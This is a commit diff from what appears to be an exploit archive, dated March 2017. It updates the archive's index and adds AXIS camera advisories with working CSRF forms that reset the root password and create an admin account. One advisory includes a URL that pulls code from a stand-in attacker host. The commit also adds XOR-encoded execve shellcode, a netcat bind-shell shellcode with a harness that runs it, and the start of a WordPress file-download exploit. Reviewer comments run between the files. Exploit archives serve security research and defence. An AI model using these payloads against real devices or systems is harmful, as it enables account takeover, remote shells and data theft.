DB: 2017-03-18
8 new exploits Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow FTPShell Client 6.53 - Local Buffer Overflow Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes) Linux/x86 - Bind Shell Shellcode (51 bytes) Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download AXIS Communications - Cross-Site Scripting / Content Injection AXIS Multiple Products - Cross-Site Request Forgery Departmental Store Management System 1.2 - SQL Injection
This commit is contained in:
parent
5b8d706b7d
commit
4da96605a4
9 changed files with 661 additions and 0 deletions
|
@ -5397,7 +5397,9 @@ id,file,description,date,author,platform,type,port
|
||||||
41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||||
41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||||
41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
|
41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
|
||||||
|
41620,platforms/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",windows,dos,0
|
||||||
41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
|
41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
|
||||||
|
41629,platforms/windows/dos/41629.py,"FTPShell Client 6.53 - Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,windows,dos,0
|
||||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||||
|
@ -15956,6 +15958,8 @@ id,file,description,date,author,platform,type,port
|
||||||
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||||
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||||
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
|
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
|
||||||
|
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
|
||||||
|
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (51 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
|
||||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||||
|
@ -37534,3 +37538,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41616,platforms/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps,0
|
41616,platforms/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps,0
|
||||||
41617,platforms/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps,0
|
41617,platforms/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps,0
|
||||||
41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0
|
41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0
|
||||||
|
41622,platforms/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",php,webapps,0
|
||||||
|
41625,platforms/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,hardware,webapps,0
|
||||||
|
41626,platforms/hardware/webapps/41626.txt,"AXIS Multiple Products - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps,0
|
||||||
|
41627,platforms/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",php,webapps,0
|
||||||
|
|
|
229
platforms/hardware/webapps/41625.txt
Executable file
|
@ -0,0 +1,229 @@
|
||||||
|
0RWELLL4BS
|
||||||
|
**********
|
||||||
|
security advisory
|
||||||
|
olsa-2015-8258
|
||||||
|
PGP: 79A6CCC0
|
||||||
|
@orwelllabs
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Advisory Information
|
||||||
|
====================
|
||||||
|
- Title: ImagePath Resource Injection/Open script editor
|
||||||
|
- Vendor: AXIS Communications
|
||||||
|
- Research and Advisory: Orwelllabs
|
||||||
|
- Class: Improper Input Validation [CWE-20]
|
||||||
|
- CVE Name: CVE-2015-8258
|
||||||
|
- Affected Versions: Firmwares versions <lt 5.80.x
|
||||||
|
- IoT Attack Surface: Device Administrative Interface/Authentication/Autho
|
||||||
|
rization
|
||||||
|
- OWASP IoTTop10: I1, I2
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details
|
||||||
|
=================
|
||||||
|
The variable "imagePath=" (that is prone to XSS in a large range of
|
||||||
|
products) also can be used to resource injection intents. If inserted a URL
|
||||||
|
in this variable will be made an GET request to this URL, so this an
|
||||||
|
interesting point to request malicious codes from the attacker machine, and
|
||||||
|
of course, the possibilities are vast (including hook the browser).
|
||||||
|
|
||||||
|
|
||||||
|
An attacker sends the following URL for the current Web user interface of
|
||||||
|
the camera:
|
||||||
|
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
|
||||||
|
st.com/evilcode.html
|
||||||
|
|
||||||
|
This request will be processed normally and will return the status code 200
|
||||||
|
(OK):
|
||||||
|
|
||||||
|
[REQUEST]
|
||||||
|
|
||||||
|
GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
|
||||||
|
Host: {axisvulnhost}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
|
||||||
|
Firefox/41.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
|
||||||
|
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
|
||||||
|
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
|
||||||
|
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
|
||||||
|
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
|
||||||
|
GET /evilcode.html HTTP/1.1
|
||||||
|
Host: www.3vilh0st.com
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
|
||||||
|
Firefox/41.0
|
||||||
|
Accept: image/png,image/*;q=0.8,*/*;q=0.5
|
||||||
|
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
|
||||||
|
st.com/evilcode.html
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
The server response can be seen below (with the clipping of the affected
|
||||||
|
HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):
|
||||||
|
|
||||||
|
|
||||||
|
<table border="0" cellpadding="3" cellspacing="3">
|
||||||
|
<tr>
|
||||||
|
<td id="videoStreamTable">
|
||||||
|
<script language="JavaScript">
|
||||||
|
<!--
|
||||||
|
video('http://www.3vilh0st.com/evilcode.html');
|
||||||
|
// -->
|
||||||
|
</script>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
function listVideoSources()
|
||||||
|
{
|
||||||
|
var formInt = document.listFormInt;
|
||||||
|
var formExt = document.listFormExt;
|
||||||
|
var formCrop = document.listFormCrop;
|
||||||
|
var presetForm = document.listFormPreset;
|
||||||
|
var form = document.WizardForm
|
||||||
|
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
|
||||||
|
var imageSource;
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
var reload = false;
|
||||||
|
reload |= (other != null && other.search("seq=yes") >= 0);
|
||||||
|
reload |= (other != null && other.search("streamprofile=") >= 0);
|
||||||
|
reload |= ((other == null || (other != null && other.search("streamprofile=
|
||||||
|
;)(r") == -1)) && ('' != ""));
|
||||||
|
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
<script SRC="/incl/activeX.js?id=69"></script>
|
||||||
|
</head>
|
||||||
|
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
|
||||||
|
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
|
||||||
|
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
|
||||||
|
<script language="JavaScript">
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
// Draw the scale buttons
|
||||||
|
var currentResolution = 0
|
||||||
|
var width = 0
|
||||||
|
var height = 0
|
||||||
|
var imagepath = "http://www.3vilh0st.com/evilcode.html"
|
||||||
|
var resStart = imagepath.indexOf("resolution=")
|
||||||
|
if (resStart != -1) {
|
||||||
|
var resStop = imagepath.indexOf("&", resStart)
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
|
||||||
|
=================== view.shtml snips =====================
|
||||||
|
|
||||||
|
447 function zoom(size)
|
||||||
|
448 {
|
||||||
|
449 var url = document.URL;
|
||||||
|
450
|
||||||
|
451 if (url.indexOf("?") == -1) {
|
||||||
|
452 url += "F?size=" + size
|
||||||
|
453 } else if (url.indexOf("size=") == -1) {
|
||||||
|
454 url += "&size=" + size
|
||||||
|
455 } else {
|
||||||
|
456 var searchStr = "size=<!--#echo var="size"
|
||||||
|
option="encoding:javascript" -->"
|
||||||
|
457 var replaceStr = "size=" + size
|
||||||
|
458 var re = new RegExp(searchStr , "g")
|
||||||
|
459 url = url.replace(re, replaceStr)
|
||||||
|
460 }
|
||||||
|
461
|
||||||
|
462 document.location = url;
|
||||||
|
463 }
|
||||||
|
464
|
||||||
|
465 var aNewImagePath;
|
||||||
|
466
|
||||||
|
467 function reloadPage()
|
||||||
|
468 {
|
||||||
|
469 document.location = aNewImagePath;
|
||||||
|
470 }
|
||||||
|
471
|
||||||
|
|
||||||
|
[ SNIP ]
|
||||||
|
|
||||||
|
567 aNewImagePath = '/view/view.shtml?id=<!--#echo
|
||||||
|
var="ssi_request_id" option="encoding:url" -->&imagePath=' +
|
||||||
|
escape(imagePath) + size;
|
||||||
|
568 if (other != null)
|
||||||
|
569 aNewImagePath += other;
|
||||||
|
570 <!--#if expr="$ptzpresets = yes" -->
|
||||||
|
571 /* append preset parameters so that preset postion is selected in
|
||||||
|
drop down list after reload */
|
||||||
|
572 if (presetName != '')
|
||||||
|
573 aNewImagePath += "&gotopresetname=" + escape(presetName);
|
||||||
|
574 else if (gotopresetname != '')
|
||||||
|
575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
|
||||||
|
576
|
||||||
|
577 if( newCamera != '')
|
||||||
|
578 aNewImagePath += "&camera=" + escape(newCamera);
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
---*---
|
||||||
|
Some legitimate resources can be very interesting to cybercriminals with
|
||||||
|
your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case
|
||||||
|
there are some resources, like the "Open Script Editor". By this resource
|
||||||
|
the user can edit any file in the operation system with root privileges,
|
||||||
|
because everything (in the most part of IoT devices) runs with root
|
||||||
|
privileges, this is other dangerous point to keep in mind.
|
||||||
|
|
||||||
|
> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
|
||||||
|
|
||||||
|
Well, one can say that this feature is restricted to the administrator of
|
||||||
|
the camera, and this would be true if customers were forced to change the
|
||||||
|
default password during setup phase with a strong password policy, since
|
||||||
|
change "pass" to "pass123" does not solve the problem. The aggravating
|
||||||
|
factor is that there are thousands of products available on the internet,
|
||||||
|
running with default credentials.
|
||||||
|
|
||||||
|
|
||||||
|
Vendor Information, Solutions and Workarounds
|
||||||
|
+++++++++++++++++++++++++++++++++++++++++++++
|
||||||
|
According to the manufacturer, the resource injection vulnerability was
|
||||||
|
fixed in firmware 5.60, but we identified that the problem still occurred
|
||||||
|
in 5.80.x versions of various product models. Check for updates on the
|
||||||
|
manufacturer's website.
|
||||||
|
|
||||||
|
About Open Script Editor,It was considered that in order to have access to
|
||||||
|
this feature, it is necessary to be authenticated as an admin, but if there
|
||||||
|
is no policy that forces the client to change the password during the
|
||||||
|
product setup (ease vs. security) and also requires a password complexity,
|
||||||
|
having an administrative credential to abuse the functionality is not
|
||||||
|
exactly an impediment (e.g: botnets that bring embedded in the code a
|
||||||
|
relation of default credentials for that type of device)
|
||||||
|
|
||||||
|
|
||||||
|
Credits
|
||||||
|
=======
|
||||||
|
These vulnerabilities has been discovered and published by Orwelllabs.
|
||||||
|
|
||||||
|
|
||||||
|
Legal Notices
|
||||||
|
=============
|
||||||
|
The information contained within this advisory is supplied "as-is" with no
|
||||||
|
warranties or guarantees of fitness of use or otherwise. We accept no
|
||||||
|
responsibility for any damage caused by the use or misuse of this
|
||||||
|
information.
|
||||||
|
|
||||||
|
|
||||||
|
About Orwelllabs
|
||||||
|
================
|
||||||
|
https://www.exploit-db.com/author/?a=8225
|
||||||
|
https://packetstormsecurity.com/files/author/12322/
|
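Review bot: The header line `- Affected Versions: Firmwares versions <lt 5.80.x` contradicts the Vendor Information section of the same file, which says the fix was claimed for 5.60 but the problem "still occurred in 5.80.x versions of various product models", so a reader who only scans the header block gets the wrong cut-off for exposure assessment. Aligning the two would read something like `- Affected Versions: vendor reports fixed in 5.60; still reproduced on 5.80.x (see Vendor Information below)`. The `<lt` token looks like a leftover of an escaped `<` and should be one comparison operator or plain words.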
103
platforms/hardware/webapps/41626.txt
Executable file
|
@ -0,0 +1,103 @@
|
||||||
|
0RWELLL4BS
|
||||||
|
**********
|
||||||
|
security advisory
|
||||||
|
olsa-CVE-2015-8255
|
||||||
|
PGP: 79A6CCC0
|
||||||
|
@orwelllabs
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Advisory Information
|
||||||
|
====================
|
||||||
|
- Title: Cross-Site Request Forgery
|
||||||
|
- Vendor: AXIS Communications
|
||||||
|
- Research and Advisory: Orwelllabs
|
||||||
|
- Class: Session Management control [CWE-352]
|
||||||
|
- CVE Name: CVE-2015-8255
|
||||||
|
- Affected Versions:
|
||||||
|
- IoT Attack Surface: Device Web Interface
|
||||||
|
- OWASP IoTTop10: I1
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details
|
||||||
|
=================
|
||||||
|
Because of the own (bad) design of this kind of device (Actualy a big
|
||||||
|
problem of IoT, one of them)
|
||||||
|
The embedded web application does not verify whether a valid request was
|
||||||
|
intentionally provided by the user who submitted the request.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
PoCs
|
||||||
|
====
|
||||||
|
#-> Setting root password to W!nst0n
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<!-- CSRF PoC Orwelllabs -->
|
||||||
|
<body>
|
||||||
|
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
|
||||||
|
<input type="hidden" name="action" value="update" />
|
||||||
|
<input type="hidden" name="user" value="root" />
|
||||||
|
<input type="hidden" name="pwd" value="w!nst0n" />
|
||||||
|
<input type="hidden" name="comment" value="Administrator" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
#-> Adding new credential SmithW:W!nst0n
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<!-- CSRF PoC - Orwelllabs -->
|
||||||
|
<body>
|
||||||
|
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
|
||||||
|
<input type="hidden" name="action" value="add" />
|
||||||
|
<input type="hidden" name="user" value="SmithW" />
|
||||||
|
<input type="hidden" name="sgrp"
|
||||||
|
value="viewer:operator:admin:ptz" />
|
||||||
|
<input type="hidden" name="pwd" value="W!nst0n" />
|
||||||
|
<input type="hidden" name="grp" value="users" />
|
||||||
|
<input type="hidden" name="comment" value="WebUser" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
#-> Deleting an app via directly CSRF (axis_update.shtml)
|
||||||
|
|
||||||
|
http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
|
||||||
|
http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
|
||||||
|
"></script>
|
||||||
|
|
||||||
|
|
||||||
|
[And many acitions allowed to an user [all of them?] can be forged in this
|
||||||
|
way]
|
||||||
|
|
||||||
|
|
||||||
|
Vendor Information, Solutions and Workarounds
|
||||||
|
+++++++++++++++++++++++++++++++++++++++++++++
|
||||||
|
Well, this is a very old design problem of this kind of device, nothing new
|
||||||
|
to say about that.
|
||||||
|
|
||||||
|
|
||||||
|
Credits
|
||||||
|
=======
|
||||||
|
These vulnerabilities has been discovered and published by Orwelllabs.
|
||||||
|
|
||||||
|
|
||||||
|
Legal Notices
|
||||||
|
=============
|
||||||
|
The information contained within this advisory is supplied "as-is" with no
|
||||||
|
warranties or guarantees of fitness of use or otherwise. We accept no
|
||||||
|
responsibility for any damage caused by the use or misuse of this
|
||||||
|
information.
|
||||||
|
|
||||||
|
|
||||||
|
About Orwelllabs
|
||||||
|
================
|
||||||
|
https://www.exploit-db.com/author/?a=8225
|
||||||
|
https://packetstormsecurity.com/files/author/12322/
|
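Review bot: `- Affected Versions:` is left empty in the Advisory Information block, and the Vendor Information section offers neither a fixed firmware nor a workaround, so a defender cannot tell which devices are exposed or whether an update exists. The PoC forms already show the concrete condition (state-changing `action=update` / `action=add` requests to `pwdgrp.cgi` accepted without any anti-CSRF token and while an admin session is active), and Technical Details should state that plainly instead of the general remark about IoT design. At minimum write `- Affected Versions: not determined; reproduced on firmware [VERSION-PLACEHOLDER]` and add a one-line mitigation note (the forgery only works against a browser that is logged in as admin, so default-credential rotation and not leaving the web UI reachable from untrusted networks reduce the risk).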
84
platforms/lin_x86/shellcode/41630.asm
Executable file
|
@ -0,0 +1,84 @@
|
||||||
|
;================================================================================
|
||||||
|
; The MIT License
|
||||||
|
;
|
||||||
|
; Copyright (c) <year> <copyright holders>
|
||||||
|
;
|
||||||
|
; Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||||
|
; of this software and associated documentation files (the "Software"), to deal
|
||||||
|
; in the Software without restriction, including without limitation the rights
|
||||||
|
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||||
|
; copies of the Software, and to permit persons to whom the Software is
|
||||||
|
; furnished to do so, subject to the following conditions:
|
||||||
|
;
|
||||||
|
; The above copyright notice and this permission notice shall be included in
|
||||||
|
; all copies or substantial portions of the Software.
|
||||||
|
;
|
||||||
|
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||||
|
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||||
|
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||||
|
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||||
|
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||||
|
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||||
|
; THE SOFTWARE.
|
||||||
|
;================================================================================
|
||||||
|
; Name : Encrypt Linux x86 Shellcode(44 Bytes) To exceve("/bin/sh")
|
||||||
|
; Author : WangYihang
|
||||||
|
; Email : wangyihanger@gmail.com
|
||||||
|
; Tested on: Linux_x86
|
||||||
|
; Shellcode Length: 44
|
||||||
|
;================================================================================
|
||||||
|
; Shellcode :
|
||||||
|
; char shellcode[] = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a"
|
||||||
|
; "\x06\x34\xe9\x88\x06\x46\xe2\xf7"
|
||||||
|
; "\xeb\x05\xe8\xeb\xff\xff\xff\xd8"
|
||||||
|
; "\x20\xb8\x81\xc6\xc6\x9a\x81\x81"
|
||||||
|
; "\xc6\x8b\x80\x87\x60\x0a\x83\xe2"
|
||||||
|
; "\xb1\x70\x24\x69";
|
||||||
|
;================================================================================
|
||||||
|
; Python :
|
||||||
|
; shellcode = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a\x06\x34\xe9\x88\x06\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xd8\x20\xb8\x81\xc6\xc6\x9a\x81\x81\xc6\x8b\x80\x87\x60\x0a\x83\xe2\xb1\x70\x24\x69"
|
||||||
|
;================================================================================
|
||||||
|
; Assembly language code :
|
||||||
|
|
||||||
|
global _start
|
||||||
|
; this shell code will xor every byte of 'jocker' segment , then execute them
|
||||||
|
; password is 0xe9 (233)
|
||||||
|
_start:
|
||||||
|
jmp jocker
|
||||||
|
loader:
|
||||||
|
pop esi ; get address of encrypted shellcode
|
||||||
|
xor ecx, ecx
|
||||||
|
mov cl, 21 ; loop times (length of encrypt shellcode)
|
||||||
|
decrypt:
|
||||||
|
mov al, [esi]
|
||||||
|
xor al, 0e9H
|
||||||
|
mov [esi], al
|
||||||
|
inc esi
|
||||||
|
loop decrypt
|
||||||
|
jmp encrypt
|
||||||
|
|
||||||
|
jocker:
|
||||||
|
call loader
|
||||||
|
encrypt:
|
||||||
|
db 0d8H
|
||||||
|
db 20H
|
||||||
|
db 0b8H
|
||||||
|
db 81H
|
||||||
|
db 0c6H
|
||||||
|
db 0c6H
|
||||||
|
db 9aH
|
||||||
|
db 81H
|
||||||
|
db 81H
|
||||||
|
db 0c6H
|
||||||
|
db 8bH
|
||||||
|
db 80H
|
||||||
|
db 87H
|
||||||
|
db 60H
|
||||||
|
db 0aH
|
||||||
|
db 83H
|
||||||
|
db 0e2H
|
||||||
|
db 0b1H
|
||||||
|
db 70H
|
||||||
|
db 24H
|
||||||
|
db 69H
|
||||||
|
;================================================================================
|
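Review bot: The label `encrypt:` names the block of XOR-encoded `db` bytes that the `decrypt` loop rewrites in place (`mov [esi], al`) and that `jmp encrypt` then executes, so the name says the opposite of what the data is; `encoded:` or `payload:` would match the surrounding comments. Because the loop writes into its own code, the stub only runs from a mapping that is both writable and executable, which is worth stating in the header next to `; Tested on: Linux_x86` since it is exactly the condition NX/W^X enforcement denies. The `; Name :` line has `exceve` for `execve` (the files.csv entry repeats the typo), and the MIT block still carries the unfilled `<year> <copyright holders>` placeholders.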
49
platforms/lin_x86/shellcode/41631.c
Executable file
|
@ -0,0 +1,49 @@
|
||||||
|
/*
|
||||||
|
# Super_Small_Bind_Shell (x86)
|
||||||
|
# Date: 17.03.2017
|
||||||
|
# This shellcode will listen on port 37 and show you how deep the rabbit hole goes
|
||||||
|
# Please note that 37 port is below 1024 and thus privileged!
|
||||||
|
# Shellcode Author: ALEH BOITSAU
|
||||||
|
# Shellcode Length: 51 bytes ;)
|
||||||
|
# Tested on: Debian GNU/Linux 8/x86_64
|
||||||
|
# Command: gcc -m32 -z execstack super_small_bind_shell.c -o super_small_bind_shell
|
||||||
|
|
||||||
|
global _start
|
||||||
|
section .text
|
||||||
|
_start:
|
||||||
|
xor eax, eax
|
||||||
|
push eax
|
||||||
|
push 0x3733702d ;-p37
|
||||||
|
mov esi, esp
|
||||||
|
|
||||||
|
push eax
|
||||||
|
push 0x68732f2f ;-le//bin//sh
|
||||||
|
push 0x6e69622f
|
||||||
|
push 0x2f656c2d
|
||||||
|
mov edi, esp
|
||||||
|
|
||||||
|
push eax
|
||||||
|
push 0x636e2f2f ;/bin//nc
|
||||||
|
push 0x6e69622f
|
||||||
|
mov ebx, esp
|
||||||
|
|
||||||
|
push eax
|
||||||
|
push esi
|
||||||
|
push edi
|
||||||
|
push ebx
|
||||||
|
mov ecx, esp
|
||||||
|
mov al,11
|
||||||
|
int 0x80
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
unsigned char shellcode[] =
|
||||||
|
"\x31\xc0\x50\x68\x2d\x70\x33\x37\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
|
||||||
|
main()
|
||||||
|
{
|
||||||
|
printf("Shellcode Length: %d\n",strlen(shellcode));
|
||||||
|
int (*ret)() = (int(*)())shellcode;
|
||||||
|
ret();
|
||||||
|
}
|
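Review bot: `printf("Shellcode Length: %d\n",strlen(shellcode));` passes a `size_t` to `%d`, which is undefined behaviour and prints garbage where the two widths differ; the conversion should be `%zu`. `main()` with no return type relies on the pre-C99 implicit `int`, which is an error in C99 and later and is rejected by recent compilers in their default modes, so `int main(void)` plus a trailing `return 0;` fixes both the declaration and the missing return value. The `int (*ret)() = (int(*)())shellcode;` call also depends on the `-z execstack` flag quoted in the header comment, because `shellcode[]` is an ordinary writable data object; a comment on that line saying why the harness segfaults under a default NX build would save the next reader a debugging session.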
60
platforms/php/webapps/41622.py
Executable file
|
@ -0,0 +1,60 @@
|
||||||
|
import requests
|
||||||
|
import string
|
||||||
|
import random
|
||||||
|
from urlparse import urlparse
|
||||||
|
|
||||||
|
print "---------------------------------------------------------------------"
|
||||||
|
print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187"
|
||||||
|
